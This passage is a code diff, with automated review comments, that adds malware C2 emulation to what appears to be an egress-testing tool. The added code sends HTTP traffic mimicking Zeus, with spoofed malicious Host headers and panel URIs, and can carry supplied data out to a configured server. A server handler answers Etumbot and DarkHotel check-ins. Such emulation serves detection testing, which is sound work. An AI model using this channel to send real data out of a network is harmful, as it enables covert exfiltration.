+ '/compose/panel/secure.php', '/fy97/panel/config.bin', + '/fy97/panel/secure.php', '/images/joea.bin', '/images/joea.exe', + '/images/secure.php', '/components/com_joomla/plugin/config.jpg', + '/components/com_joomla/plugin/gate.php', + '/resource/css/config.bin', '/resource/css/secure.php', + '/wp-content/upgrade/PANEL/config.jpg', + '/wp-content/upgrade/PANEL/gate.php', + '/wp-content/plugins/bcet56aoikqf52iu/food.php', + '/Scripts/_notes/build/bot.exe', + '/Scripts/_notes/build/config.bin', + '/Scripts/_notes/build/gate.php', '/REMOVED/.pop/bot.exe', + '/REMOVED/.pop/config.bin', '/REMOVED/.pop/gate.php', + '/KINS/panel/bot.exe', '/KINS/panel/config.jpg', + '/KINS/panel/gate.php', '/panel/config.jpg', '/panel/gate.php', + '/walex/files/bot.exe', '/walex/files/config.jpg', + '/walex/files/gate.php', '/e7/bot.exe', '/e7/cfg.bin', + '/e7/gate.php', + '/wp-admin/css/colors/coffee/cat/server/config.jpg', + '/wp-admin/css/colors/coffee/cat/server/gate.php', + '/site/S/13897652/5112/file.php', + '/site/S/13897652/5112/gate.php', + '/images/js/osomo/panel/config.jpg', + '/images/js/osomo/panel/gate.php', + '/themes/panel/config.jp', '/themes/panel/gate.php', + '/system/eusat/telesa/config.jpg', '/sadcxvbv/vdfbffddf.php', + '/wqwcqqw/sasasacw.php', '/images/server/file.php', + '/images/server/gate.php', '/cache/lcitorg/config.bin', + '/cache/lcitorg/gate.php', '/form/panel/config.jpg', + '/form/panel/gate.php', '/backup/gate.php', + '/backup/jera.jpg', '/images/file.php', + '/images/js/panel/config.jpg', '/images/js/panel/gate.php', + '/images/config.jpg', '/images/gate.php', + '/slim-cita/helps/file.php', '/slim-cita/helps/gate.php', + '/kin/panelz/config.jpg', '/kin/panelz/gate.php', + '/image/Panel/config.jpg', '/folder/config.bin', + '/folder/secure.php', '/plugins/panel/config.jpg', + '/plugins/panel/gate.php', + '/wp-content/plugins/slxcdfrdmn9r0x/j7.php', '/q/gate.php', + '/q/outl.jpg', '/media/k2/file.php', '/media/k2/gate.php', + '/js/MOM/config.jpg', 
'/js/MOM/gate.php', + '/lung/panel/config.jpg', '/wp/config.jpg', + '/wp/gate.php', '/data/config.jpg', '/data/gate.php', + '/templates/beez/bot.exe', '/templates/beez/config.bin', + '/templates/beez/gate.php', '/wp-includes/css/new/config.jpg', + '/wp-includes/css/new/gate.php', + '/language/pdf_fonts/server/bot.exe', + '/language/pdf_fonts/server/config.bin', + '/language/pdf_fonts/server/gate.php', '/js/liscence.php', + '/js/userslogin.php', '/ijo/config.jpg', '/ijo/gate.php', + '/Mix/valeg/bot.exe', '/Mix/valeg/config.bin', + '/Mix/valeg/gate.php', '/media/media/js/.js/ajax.php', + '/media/media/js/.js/color.jpg', '/wpc/Panel/config.jpg', + '/wpc/Panel/gate.php', '/images/gate.php', '/images/stab.jpg', + '/wpadm/Panel/config.jpg', '/wpadm/Panel/gate.php', + '/admin/b7.php', '/admin/file.php', '/amed/config.jpg', + '/amed/gate.php', '/sadcxvbv/vdfbffddf.php', + '/wpimages/image.php', '/ger/config.jpg', '/ger/gate.php', + '/percy/panel/config.jpg', '/percy/panel/gate.php', + '/map/Icons/outglav.exe', '/map/Icons/Religion/brah.png', + '/map/Icons/Religion/exejfjfjexe.exe', '/images/config.jpg', + '/images/gate.php', '/file.php', '/gate.php', '/.css/config.jpg', + '/.css/gate.php', '/colobus/gate.php', '/colobus/vsam.jpg', + '/news/secure.php', '/news/vuan.bin', '/.id/file.php', + '/.id/gate.php', + '/fast-move/cidphp/file.php', '/fast-move/cidphp/gate.php', + '/overopen/panel/config.bin', '/overopen/panel/secure.php', + '/chromez/config.jpg', '/chromez/gate.php', '/libraries/db.php', + '/sadcxvbv/vdfbffddf.php', '/wqwcqqw/sasasacw.php', + '/wp-comment/baba.jpg', '/wp-comment/gate.php', + '/alumno309/images/base.bin', '/alumno309/images/base.exe', + '/alumno309/images/secure.php', + '/wp-content/plugins/wp-db-backup-made/das.db', + '/ta_images/tools.php', '/plank/panel/config.jpg', + '/includes/database/http/config.jpg', + '/includes/database/http/zin.php', '/wqwcqqw/sasasacw.php', + '/administrator/modules/mod_menu/help/config.jpg', + 
'/administrator/modules/mod_menu/help/gate.php', '/old/jx36.bin', + '/old/jx36.exe', '/old/secure.php', '/images/icons/bt.exe', + '/images/icons/cfg.bin', '/images/icons/gate.php', '/t/wpg.php', + '/forum.php', '/config.php', '/wp-blog/gate.php', + '/wp-blog/mell.jpg', '/descargas/adm/gate.php', + '/descargas/config/orqu.bin', '/wp-rss.php', '/images/gate.php', + '/images/outl.jpg', '/images/smilies/raye.jpg', + '/images/kin/config.jpg', '/jaextmanager_data/rimm.bin', + '/jaextmanager_data/secure.php', '/js/cssme/file.php', + '/js/cssme/thread.php', '/mss/plugins/system/config.bin', + '/mss/plugins/system/gate.php', '/wp-admin/maint/config.bin', + '/wp-admin/maint/gate.php', '/blog/wp-content/uploads/kim.dot', + '/images/secure.php', '/images/todo.bin', '/images/todo.exe', + '/plugins/system/bot.exe', '/plugins/system/config.bin', + '/plugins/system/gate.php', '/modules/mod_footer/tmpl/file.php', + '/modules/mod_footer/tmpl/gate.php', '/modules/secure.php', + '/modules/warp.bin', '/modules/warp.exe', '/file.php', + '/gate.php', '/db1/config.jpg', '/db1/gate.php', + '/katolog/thumbs/panel/config.jpg', + '/katolog/thumbs/panel/gate.php'] + + def emulate(self, data_to_exfil=None): + + # headers that are used in get requests + zeus_headers = { + "Accept": "*/*", + "Connection": "Close", + "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", + "Pragma": "no-cache" + } + + # Iterate over get and post request 5 times + for times_requested in xrange(1, 6): + selected_domain = random.choice(self.domains) + zeus_headers['Host'] = selected_domain + first_uri = random.choice(self.uris) + + get_request = urllib2.Request( + "http://" + self.egress_server + first_uri, + headers=zeus_headers) + try: + urllib2.urlopen(get_request) + except urllib2.URLError: + print "[*] Error: Cannot connect to zeus data exfil server!" + print "[*] Error: Possible firewall, or proxy prventing this?" 
+ sys.exit(1) + + select_post_uri = False + while not select_post_uri: + post_uri = random.choice(self.uris) + if post_uri.endswith('.exe'): + pass + else: + select_post_uri = True + + # Determining which data is being sent out by agent + if data_to_exfil is None: + posted_data = random.choice(self.post_data) + else: + posted_data = {'zeus_data': data_to_exfil} + + # UrlEncode and send the data out + posted_data = urllib.urlencode(posted_data) + post_req = urllib2.Request( + "http://" + self.egress_server + post_uri, posted_data, + headers=zeus_headers) + + try: + urllib2.urlopen(post_req) + except urllib2.URLError: + print "[*] Error: Cannot connect to putter zeus exfil server!" + print "[*] Error: Possible firewall, or proxy prventing this?" + sys.exit(1) + + print "[*] INFO: Zeus C2 comms complete!" + + return diff --git a/common/helpers.py b/common/helpers.py index 78ec50f..55dbc78 100644 --- a/common/helpers.py +++ b/common/helpers.py @@ -33,6 +33,14 @@ def cli_parser(): protocols.add_argument("--ip", metavar="192.168.1.2", default=None, help="IP to extract data to.") + actors = parser.add_argument_group('Actor Emulation') + actors.add_argument( + "--actor", default=None, metavar="[zeus]", + help="Emulate [actor] C2 comms to egress server.") + actors.add_argument( + "--list-actors", default=False, action='store_true', + help="List all supported malware/APT group modules") + servers = parser.add_argument_group('Server Protocol Options') servers.add_argument( "--server", default=None, metavar='[http]', 
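Review bot: The `self.domains` literal is missing a comma between `'mccc-investconsultant.com'` and `'muazymaur.tk'`, so Python concatenates them into one entry, one domain is lost and the emulated `Host` header can become `mccc-investconsultant.commuazymaur.tk`; add the comma. The POST error message says `putter zeus exfil server`, a leftover from the putterpanda copy. The `while not select_post_uri` loop with its `pass` branch is a one-liner with the same distribution: `post_uri = random.choice([u for u in self.uris if not u.endswith('.exe')])`. `self.uris` is also a hand copy of the `malware_uris` list the malware_callbacks.py hunk adds on the server side; two copies will drift and the server will 404 on any URI present only here, so import the list from one place. As in the other actor hunks, `times_requested` is unused and the `urlopen` responses are never closed.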
@@ -74,19 +82,19 @@ def cli_parser(): print "[*] Error: FTP or SFTP connections require \ a username and password!".replace(' ', '') print "[*] Error: Please re-run and provide the required info!" - sys.exit() + sys.exit(1) if args.client and args.ip is None: print "[*] Error: You said to act like a client, but provided no ip" print "[*] Error: to connect to. Please re-run with required info!" - sys.exit() + sys.exit(1) if (args.client is not None) and (args.datatype is None) and ( args.file is None): print "[*] Error: You need to tell Egress-Assess the type \ of data to send!".replace(' ', '') print "[*] Error: to connect to. Please re-run with required info!" - sys.exit() + sys.exit(1) if (args.client is None and args.server is None and args.list_servers is None and args.list_clients is None and @@ -95,7 +103,12 @@ def cli_parser(): a server or client!".replace(' ', '') print "[*] Error: Please re-run and provide an action to perform!" parser.print_help() - sys.exit() + sys.exit(1) + + if args.actor is not None and args.ip is None: + print "[*] Error: You did not provide an IP to egress data to!" + print "[*] Error: Please re-run and provide an ip!" + sys.exit(1) return args diff --git a/common/orchestra.py b/common/orchestra.py index 7bb5a84..517fb0d 100644 --- a/common/orchestra.py +++ b/common/orchestra.py @@ -6,6 +6,8 @@ This is the conductor which controls everything import glob import imp +from commandcontrol.malware import * +from commandcontrol.apt import * from protocols.servers import * from protocols.clients import * from datatypes import * @@ -19,6 +21,7 @@ class Conductor: self.client_protocols = {} self.server_protocols = {} self.datatypes = {} + self.actor_modules = {} def load_client_protocols(self, command_line_object): for name in glob.glob('protocols/clients/*.py'): 
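Review bot: The new `--actor`/`--ip` check at the end of `cli_parser` comes after the "act as a server or client" check, whose condition starts in the previous hunk's context (`args.client is None and args.server is None and args.list_servers is None and args.list_clients is None and`) and continues outside both hunks; nothing visible in this commit adds `args.actor` or `args.list_actors` to it, so if the unseen remainder does not already consider them, an `--actor X --ip Y` invocation may be rejected as having no action before the new check is reached — worth confirming. In this file's first hunk `--actor` accepts any string (`metavar="[zeus]"`, no `choices`), so a mistyped actor name is only discovered once module loading runs; a help-text note that the value must match a name printed by `--list-actors` would help.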
@@ -27,7 +30,6 @@ class Conductor: self.client_protocols[name] = loaded_client_proto.Client(command_line_object) return - def load_server_protocols(self, command_line_object): for name in glob.glob('protocols/servers/*.py'): if name.endswith(".py") and ("__init__" not in name): @@ -41,3 +43,14 @@ class Conductor: loaded_datatypes = imp.load_source(name.replace("/", ".").rstrip('.py'), name) self.datatypes[name] = loaded_datatypes.Datatype(command_line_object) return + + def load_actors(self, command_line_object): + for name in glob.glob('commandcontrol/malware/*.py'): + if name.endswith(".py") and ("__init__" not in name): + loaded_actors = imp.load_source(name.replace("/", ".").rstrip('.py'), name) + self.actor_modules[name] = loaded_actors.Actor(command_line_object) + for name in glob.glob('commandcontrol/apt/*.py'): + if name.endswith(".py") and ("__init__" not in name): + loaded_actors = imp.load_source(name.replace("/", ".").rstrip('.py'), name) + self.actor_modules[name] = loaded_actors.Actor(command_line_object) + return diff --git a/protocols/clients/https_client.py b/protocols/clients/https_client.py index 376d271..148c6e8 100644 --- a/protocols/clients/https_client.py +++ b/protocols/clients/https_client.py @@ -4,7 +4,6 @@ This is the web client code ''' -import ssl import sys import urllib2 @@ -24,15 +23,6 @@ class Client: self.file_transfer = cli_object.file def transmit(self, data_to_transmit): - # This restores the same behavior as before. - try: - _create_unverified_https_context = ssl._create_unverified_context - except AttributeError: - # Legacy Python that doesn't verify HTTPS certificates by default - pass - else: - # Handle target environment that doesn't support HTTPS verification - ssl._create_default_https_context = _create_unverified_https_context if not self.file_transfer: url = "https://" + self.remote_server + "/post_data.php" 
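Review bot: `load_actors` derives the module name with `name.replace("/", ".").rstrip('.py')`, which strips any trailing run of the characters `.`, `p` and `y` rather than the `.py` suffix, so a future module such as `commandcontrol/apt/happy.py` would be registered as `commandcontrol.apt.ha`; the existing loaders in this file use the same idiom, but new code should use `name[:-3].replace("/", ".")`, which is safe because of the `endswith(".py")` guard. The two loop bodies are identical and can be one loop: `for name in glob.glob('commandcontrol/malware/*.py') + glob.glob('commandcontrol/apt/*.py'):`. The `from commandcontrol.malware import *` and `from commandcontrol.apt import *` lines in this file's first hunk bring nothing into scope that `load_actors` uses, since every module is loaded through `imp.load_source`; they can be dropped (the same pair is added to base_handler.py).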
diff --git a/protocols/servers/serverlibs/web/base_handler.py b/protocols/servers/serverlibs/web/base_handler.py index 481b046..039ceb2 100644 --- a/protocols/servers/serverlibs/web/base_handler.py +++ b/protocols/servers/serverlibs/web/base_handler.py @@ -1,7 +1,11 @@ import os +import random import time from BaseHTTPServer import BaseHTTPRequestHandler from common import helpers +from commandcontrol.apt import * +from commandcontrol.malware import * +from protocols.servers.serverlibs.web import malware_callbacks class GetHandler(BaseHTTPRequestHandler): 
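Review bot: `from commandcontrol.apt import *` and `from commandcontrol.malware import *` bring nothing the handler uses — the new branches reference only `malware_callbacks` and `random` — and star-importing package `__init__` modules hides what, if anything, they provide; keep `import random` and the `malware_callbacks` import and drop the two star lines. If they are meant to assert that the packages are importable, a one-line comment saying so would stop the next reader from removing them.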
@@ -11,20 +15,67 @@ class GetHandler(BaseHTTPRequestHandler): # should be performing GET requests Help from # http://pymotw.com/2/BaseHTTPServer/ def do_GET(self): + if self.path in malware_callbacks.malware_uris: + self.send_response(200) + self.end_headers() - # 404 since we aren't serving up any pages, only receiving data - self.send_response(404) - self.end_headers() + elif self.path == malware_callbacks.etumbot_checkin: + self.send_response(200) + self.end_headers() + self.wfile.write(malware_callbacks.etumbot_checkin_response) + + elif ((self.path.startswith(malware_callbacks.etumbot_uri) or self.path.startswith(malware_callbacks.etumbot_uri2)) and (self.path.endswith(malware_callbacks.etumbot_extensions) or self.path.endswith(malware_callbacks.etumbot_extensions2)) or self.path.startswith(malware_callbacks.etumbot_uri3) or self.path.startswith(malware_callbacks.etumbot_uri4) or self.path.startswith(malware_callbacks.etumbot_uri5)): + # current directory + exfil_directory = os.path.join(helpers.ea_path(), "data") + loot_path = exfil_directory + "/" + if not os.path.isdir(loot_path): + os.makedirs(loot_path) + # Get the date info + current_date = time.strftime("%m/%d/%Y") + current_time = time.strftime("%H:%M:%S") + screenshot_name = current_date.replace("/", "") +\ + "_" + current_time.replace(":", "") + "actor_data.txt" + with open(loot_path + screenshot_name, 'a') as cc_data_file: + cc_data_file.write('etumbot just checked in here!\n') + self.send_response(200) + self.end_headers() + self.wfile.write(random.choice(malware_callbacks.encoded_response)) + + elif self.path == malware_callbacks.darkhotel_checkin: + self.send_response(200) + self.end_headers() + self.wfile.write('DEXT8726.168.15.192') + + elif self.path == malware_callbacks.darkhotel_checkin2: + self.send_response(200) + self.end_headers() + self.wfile.write('DEXT87no') + + elif self.path.startswith(malware_callbacks.darkhotel_uri): + exfil_directory = os.path.join(helpers.ea_path(), "data") + 
loot_path = exfil_directory + "/" + if not os.path.isdir(loot_path): + os.makedirs(loot_path) + # Get the date info + current_date = time.strftime("%m/%d/%Y") + current_time = time.strftime("%H:%M:%S") + screenshot_name = current_date.replace("/", "") +\ + "_" + current_time.replace(":", "") + "actor_data.txt" + with open(loot_path + screenshot_name, 'a') as cc_data_file: + cc_data_file.write('DarkHotel just checked in here!\n') + self.send_response(200) + self.end_headers() + self.wfile.write('DKCheckin good') + + else: + # 404 since we aren't serving up any pages, only receiving data + self.send_response(404) + self.end_headers() return # handle post request def do_POST(self): - # Gather the Posted URI from the agent/browser - # parsed_path = urlparse.urlparse(self.path) - uri_posted = self.path - uri_posted = uri_posted.replace("/", "") - #incoming_ip = self.client_address[0] # current directory exfil_directory = os.path.join(helpers.ea_path(), "data") loot_path = exfil_directory + "/" @@ -32,7 +83,7 @@ class GetHandler(BaseHTTPRequestHandler): # Info for this from - # http://stackoverflow.com/questions/13146064/simple- # python-webserver-to-save-file - if uri_posted == "post_data.php": + if self.path == "/post_data.php": self.send_response(200) self.end_headers() @@ -56,7 +107,7 @@ class GetHandler(BaseHTTPRequestHandler): with open(loot_path + screenshot_name, 'a') as cc_data_file: cc_data_file.write(screen_data) - elif uri_posted == "post_file.php": + elif self.path == "/post_file.php": self.send_response(200) self.end_headers() @@ -75,7 +126,7 @@ class GetHandler(BaseHTTPRequestHandler): with open(loot_path + file_name, 'wb') as cc_data_file: cc_data_file.write(file_data) - elif uri_posted == "posh_file.php": + elif self.path == "/posh_file.php": self.send_response(200) self.end_headers() 
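Review bot: The directory-creation, timestamp and append-to-`actor_data.txt` sequence appears twice in `do_GET` (the etumbot and darkhotel branches) and a third time in the `do_POST` hunk below, differing only in the logged string; it belongs in one helper on the handler, sketched below, so the three copies cannot drift. The long etumbot `elif` mixes `and` and `or` with only partial parentheses, which Python resolves as `(A or B) and (C or D) or E or F or G`; if that is the intent, a comment saying so — or binding the two halves to named booleans first — saves the next reader from re-deriving it. `do_GET` starts and ends inside this hunk.
```python
    def _log_actor_checkin(self, line):
        # Append one line to a timestamped actor_data.txt under <ea_path>/data,
        # creating the directory on first use (same path/name scheme as before).
        loot_path = os.path.join(helpers.ea_path(), "data") + "/"
        if not os.path.isdir(loot_path):
            os.makedirs(loot_path)
        log_name = time.strftime("%m%d%Y_%H%M%S") + "actor_data.txt"
        with open(loot_path + log_name, 'a') as cc_data_file:
            cc_data_file.write(line)

    def do_GET(self):
        # … unchanged: malware_uris and etumbot_checkin branches …
        elif (...):  # etumbot condition, unchanged
            self._log_actor_checkin('etumbot just checked in here!\n')
            self.send_response(200)
            self.end_headers()
            self.wfile.write(random.choice(malware_callbacks.encoded_response))
        # … unchanged: darkhotel_checkin and darkhotel_checkin2 branches …
        elif self.path.startswith(malware_callbacks.darkhotel_uri):
            self._log_actor_checkin('DarkHotel just checked in here!\n')
            self.send_response(200)
            self.end_headers()
            self.wfile.write('DKCheckin good')
        # … unchanged: 404 default …
```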
@@ -91,6 +142,30 @@ class GetHandler(BaseHTTPRequestHandler): with open(loot_path + filename, 'wb') as cc_data_file: cc_data_file.write(data) + elif (self.path in malware_callbacks.malware_uris) or (self.path.startswith(other_uri) for other_uri in malware_callbacks.other_apt_uris): + + self.send_response(200) + self.end_headers() + + # Check to make sure the agent directory exists, and a loot + # directory for the agent. If not, make them + if not os.path.isdir(loot_path): + os.makedirs(loot_path) + + # Get the date info + current_date = time.strftime("%m/%d/%Y") + current_time = time.strftime("%H:%M:%S") + screenshot_name = current_date.replace("/", "") +\ + "_" + current_time.replace(":", "") + "actor_data.txt" + + # Read the length of the screenshot file being uploaded + screen_length = self.headers['content-length'] + screen_data = self.rfile.read(int(screen_length)) + + # Write out the file + with open(loot_path + screenshot_name, 'a') as cc_data_file: + cc_data_file.write(screen_data) + # All other Post requests else: diff --git a/protocols/servers/serverlibs/web/malware_callbacks.py b/protocols/servers/serverlibs/web/malware_callbacks.py new file mode 100644 index 0000000..3ae532d --- /dev/null +++ b/protocols/servers/serverlibs/web/malware_callbacks.py 
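Review bot: The new `elif` condition `(self.path in malware_callbacks.malware_uris) or (self.path.startswith(other_uri) for other_uri in malware_callbacks.other_apt_uris)` is always true, because the parenthesised generator expression is an object and therefore truthy; every POST that misses the three named endpoints lands in this branch and the final `else` becomes unreachable. It should read `... or any(self.path.startswith(other_uri) for other_uri in malware_callbacks.other_apt_uris)`. The branch then trusts the client-supplied length: a request without the header raises on `self.headers['content-length']`, and whatever value it carries is read wholesale into memory, so `int(self.headers.get('content-length', 0))` with an upper bound before `self.rfile.read` would keep a malformed request from taking down the listener (the existing `post_data.php` branch has the same pattern). The loot-writing sequence here duplicates the two copies in the `do_GET` hunk. `do_POST` starts outside this hunk.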
@@ -0,0 +1,208 @@ +''' + +This file is for managing malware/APT callbacks + +''' + +malware_uris = [ + '/jm32/includes/site/bot.exe', '/jm32/includes/site/config.bin', + '/jm32/includes/site/gate.php', '/mathew/config.jpg', + '/docs/.docs/config.jpg', '/docs/.docs/do.php', + '/zeujuus/a/gate.php', '/zeujuus/a/modules/bot.exe', + '/zeujuus/a/modules/config.bin', + '/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php', + '/zejius/2HZG41Zw/bot.exe', + '/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin', + '/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php', + '/zejius/5GPR0iy9/bot.exe', + '/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin', '/past/config.jpg', + '/past/gate.php', '/fan/base/config.jpg', + '/wp-includes/pomo/panel/config.jpg', + '/wp-includes/pomo/panel/gate.php', '/themes/panel/config.jpg', + '/themes/panel/gate.php', '/home/libraries/joomla/php/gate.php', + '/home/plugins/system/tmp/bot.scr', + '/home/plugins/system/tmp/config.bin', + '/home/plugins/system/tmp/gate.php', '/js/ssj/config.jpg', + '/js/ssj/gate.php', '/site/tmp/xml/config.jpg', + '/site/tmp/xml/gate.php', '/news/wpg.php', '/file.php', + '/.cgi-bin./as.bin', '/wp-content/themes/bmw_lab/new.ban', + '/wp-content/themes/bmw_lab/newnew.wav', '/vs/panel/config.jpg', + '/vs/panel/gate.php', '/brand/server/file.php', + '/brand/server/gate.php', + '/wp-admin/css/colors/sunrise/admin/bot.exe', + '/wp-admin/css/colors/sunrise/admin/config.bin', + '/wp-admin/css/colors/sunrise/admin/secure.php', + '/wp-content/themes/chagim/library/images/plates/bot.exe', + '/wp-content/themes/chagim/library/images/plates/config.bin', + '/wp-content/themes/chagim/library/images/plates/gate.php', + '/images/burr_insurance001001.php', '/images/team/config.jpg', + '/images/team/gate.php', '/test/config.jpg', '/test/gate.php', + '/ray/server/file.php', '/ray/server/gate.php', '/capa.bin', + '/capa.exe', '/secure.php', '/ral/30/config.bin', + '/ral/30/secure.php', '/wp-admin/css/config.bin', + '/wp-admin/css/gate.php', '/wp-admin/css/setup.exe', + 
'/panel/config.jpg', '/panel/gate.php', + '/wp-includes2/SimplePie/Net/page/config.jpg', + '/wp-includes2/SimplePie/Net/page/gate.php', + '/includes/.srv/srv/bot.exe', + '/includes/.srv/srv/config.bin', '/includes/.srv/srv/gate.php', + '/ric/30/config.bin', '/ric/30/secure.php', '/blog/crea.bin', + '/blog/crea.exe', '/blog/secure.php', '/images2/dave.jpg', + '/images2/gate.php', '/wp-includes/ID3/config.jpg', + '/wp-includes/ID3/gate.php', '/emman/panel/config.jpg', + '/emman/panel/gate.php', '/xampp/img/escu.bin', + '/xampp/img/escu.exe', '/xampp/img/secure.php', + '/.css/config.jpg', '/.css/gate.php', '/admin/cfg.bin', + '/admin/gate.php', '/isai/modules/mod_upgrade/bot.exe', + '/isai/modules/mod_upgrade/config.bin', + '/isai/modules/mod_upgrade/gate.php', '/wp-comment/firs.jpg', + '/wp-comment/gate.php', '/panel/file.php', '/panel/gate.php', + '/images01/fong.bin', '/images01/fong.exe', '/images01/gate.php', + '/img/vg.php', '/components/com_file/file.php', + '/components/com_file/gate.php', '/images/panel/config.jpg', + '/images/panel/gate.php', '/wordpress/gate.php', + '/wordpress/gree.jpg', '/media/.tmp/file.php', + '/media/.tmp/gate.php', '/gate.php', '/modules/holl.bin', + '/modules/holl.exe', '/templates/admin/install/config.jpg', + '/templates/admin/install/gate.php', + '/tmp/admin/install/config.jpg', '/tmp/admin/install/gate.php', + '/tmp/cp/config.jpg', '/tmp/cp/gate.php', + '/tmp/install/config.jpg', '/tmp/install/gate.php', + '/frank/panel/config.jpg', '/frank/panel/gate.php', + '/tmp/configs/new/vg.php', '/meask/lite/file.php', + '/meask/lite/gate.php', '/css/src/admin/config.jpg', + '/css/src/admin/gate.php', '/js/admin/install/config.jpg', + '/js/admin/install/gate.php', + '/wp-content/plugins/wp-db-backup-made/work.php', + '/update/bot.exe', '/update/cfg.bin', '/update/gate.php', + '/chopinschumann/ital.bin', '/chopinschumann/ital.exe', + '/chopinschumann/secure.php', '/images/ital.bin', + '/images/ital.exe', '/images/secure.php', + 
'/compose/panel/bot.exe', '/compose/panel/config.bin', + '/compose/panel/secure.php', '/fy97/panel/config.bin', + '/fy97/panel/secure.php', '/images/joea.bin', '/images/joea.exe', + '/images/secure.php', '/components/com_joomla/plugin/config.jpg', + '/components/com_joomla/plugin/gate.php', + '/resource/css/config.bin', '/resource/css/secure.php', + '/wp-content/upgrade/PANEL/config.jpg', + '/wp-content/upgrade/PANEL/gate.php', + '/wp-content/plugins/bcet56aoikqf52iu/food.php', + '/Scripts/_notes/build/bot.exe', + '/Scripts/_notes/build/config.bin', + '/Scripts/_notes/build/gate.php', '/REMOVED/.pop/bot.exe', + '/REMOVED/.pop/config.bin', '/REMOVED/.pop/gate.php', + '/KINS/panel/bot.exe', '/KINS/panel/config.jpg', + '/KINS/panel/gate.php', '/panel/config.jpg', '/panel/gate.php', + '/walex/files/bot.exe', '/walex/files/config.jpg', + '/walex/files/gate.php', '/e7/bot.exe', '/e7/cfg.bin', + '/e7/gate.php', + '/wp-admin/css/colors/coffee/cat/server/config.jpg', + '/wp-admin/css/colors/coffee/cat/server/gate.php', + '/site/S/13897652/5112/file.php', + '/site/S/13897652/5112/gate.php', + '/images/js/osomo/panel/config.jpg', + '/images/js/osomo/panel/gate.php', + '/themes/panel/config.jp', '/themes/panel/gate.php', + '/system/eusat/telesa/config.jpg', '/sadcxvbv/vdfbffddf.php', + '/wqwcqqw/sasasacw.php', '/images/server/file.php', + '/images/server/gate.php', '/cache/lcitorg/config.bin', + '/cache/lcitorg/gate.php', '/form/panel/config.jpg', + '/form/panel/gate.php', '/backup/gate.php', + '/backup/jera.jpg', '/images/file.php', + '/images/js/panel/config.jpg', '/images/js/panel/gate.php', + '/images/config.jpg', '/images/gate.php', + '/slim-cita/helps/file.php', '/slim-cita/helps/gate.php', + '/kin/panelz/config.jpg', '/kin/panelz/gate.php', + '/image/Panel/config.jpg', '/folder/config.bin', + '/folder/secure.php', '/plugins/panel/config.jpg', + '/plugins/panel/gate.php', + '/wp-content/plugins/slxcdfrdmn9r0x/j7.php', '/q/gate.php', + '/q/outl.jpg', '/media/k2/file.php', 
'/media/k2/gate.php', + '/js/MOM/config.jpg', '/js/MOM/gate.php', + '/lung/panel/config.jpg', '/wp/config.jpg', + '/wp/gate.php', '/data/config.jpg', '/data/gate.php', + '/templates/beez/bot.exe', '/templates/beez/config.bin', + '/templates/beez/gate.php', '/wp-includes/css/new/config.jpg', + '/wp-includes/css/new/gate.php', + '/language/pdf_fonts/server/bot.exe', + '/language/pdf_fonts/server/config.bin', + '/language/pdf_fonts/server/gate.php', '/js/liscence.php', + '/js/userslogin.php', '/ijo/config.jpg', '/ijo/gate.php', + '/Mix/valeg/bot.exe', '/Mix/valeg/config.bin', + '/Mix/valeg/gate.php', '/media/media/js/.js/ajax.php', + '/media/media/js/.js/color.jpg', '/wpc/Panel/config.jpg', + '/wpc/Panel/gate.php', '/images/gate.php', '/images/stab.jpg', + '/wpadm/Panel/config.jpg', '/wpadm/Panel/gate.php', + '/admin/b7.php', '/admin/file.php', '/amed/config.jpg', + '/amed/gate.php', '/sadcxvbv/vdfbffddf.php', + '/wpimages/image.php', '/ger/config.jpg', '/ger/gate.php', + '/percy/panel/config.jpg', '/percy/panel/gate.php', + '/map/Icons/outglav.exe', '/map/Icons/Religion/brah.png', + '/map/Icons/Religion/exejfjfjexe.exe', '/images/config.jpg', + '/images/gate.php', '/file.php', '/gate.php', '/.css/config.jpg', + '/.css/gate.php', '/colobus/gate.php', '/colobus/vsam.jpg', + '/news/secure.php', '/news/vuan.bin', '/.id/file.php', + '/.id/gate.php', + '/fast-move/cidphp/file.php', '/fast-move/cidphp/gate.php', + '/overopen/panel/config.bin', '/overopen/panel/secure.php', + '/chromez/config.jpg', '/chromez/gate.php', '/libraries/db.php', + '/sadcxvbv/vdfbffddf.php', '/wqwcqqw/sasasacw.php', + '/wp-comment/baba.jpg', '/wp-comment/gate.php', + '/alumno309/images/base.bin', '/alumno309/images/base.exe', + '/alumno309/images/secure.php', + '/wp-content/plugins/wp-db-backup-made/das.db', + '/ta_images/tools.php', '/plank/panel/config.jpg', + '/includes/database/http/config.jpg', + '/includes/database/http/zin.php', '/wqwcqqw/sasasacw.php', + 
'/administrator/modules/mod_menu/help/config.jpg', + '/administrator/modules/mod_menu/help/gate.php', '/old/jx36.bin', + '/old/jx36.exe', '/old/secure.php', '/images/icons/bt.exe', + '/images/icons/cfg.bin', '/images/icons/gate.php', '/t/wpg.php', + '/forum.php', '/config.php', '/wp-blog/gate.php', + '/wp-blog/mell.jpg', '/descargas/adm/gate.php', + '/descargas/config/orqu.bin', '/wp-rss.php', '/images/gate.php', + '/images/outl.jpg', '/images/smilies/raye.jpg', + '/images/kin/config.jpg', '/jaextmanager_data/rimm.bin', + '/jaextmanager_data/secure.php', '/js/cssme/file.php', + '/js/cssme/thread.php', '/mss/plugins/system/config.bin', + '/mss/plugins/system/gate.php', '/wp-admin/maint/config.bin', + '/wp-admin/maint/gate.php', '/blog/wp-content/uploads/kim.dot', + '/images/secure.php', '/images/todo.bin', '/images/todo.exe', + '/plugins/system/bot.exe', '/plugins/system/config.bin', + '/plugins/system/gate.php', '/modules/mod_footer/tmpl/file.php', + '/modules/mod_footer/tmpl/gate.php', '/modules/secure.php', + '/modules/warp.bin', '/modules/warp.exe', '/file.php', + '/gate.php', '/db1/config.jpg', '/db1/gate.php', + '/katolog/thumbs/panel/config.jpg', + '/katolog/thumbs/panel/gate.php', '/home/index.asp?typeid=13'] + +other_apt_uris = [ + '/search5', '/microsoft/errorpost/default.aspx?ID=', + '/MicrosoftUpdate/ShellEX/KB', '/MicrosoftUpdate/WWRONG/KB', + '/MicrosoftUpdate/GetFiles/KB', '/MicrosoftUpdate/GetUpdate/KB'] + +etumbot_checkin = '/home/index.asp/typeid=13' +etumbot_checkin_response = 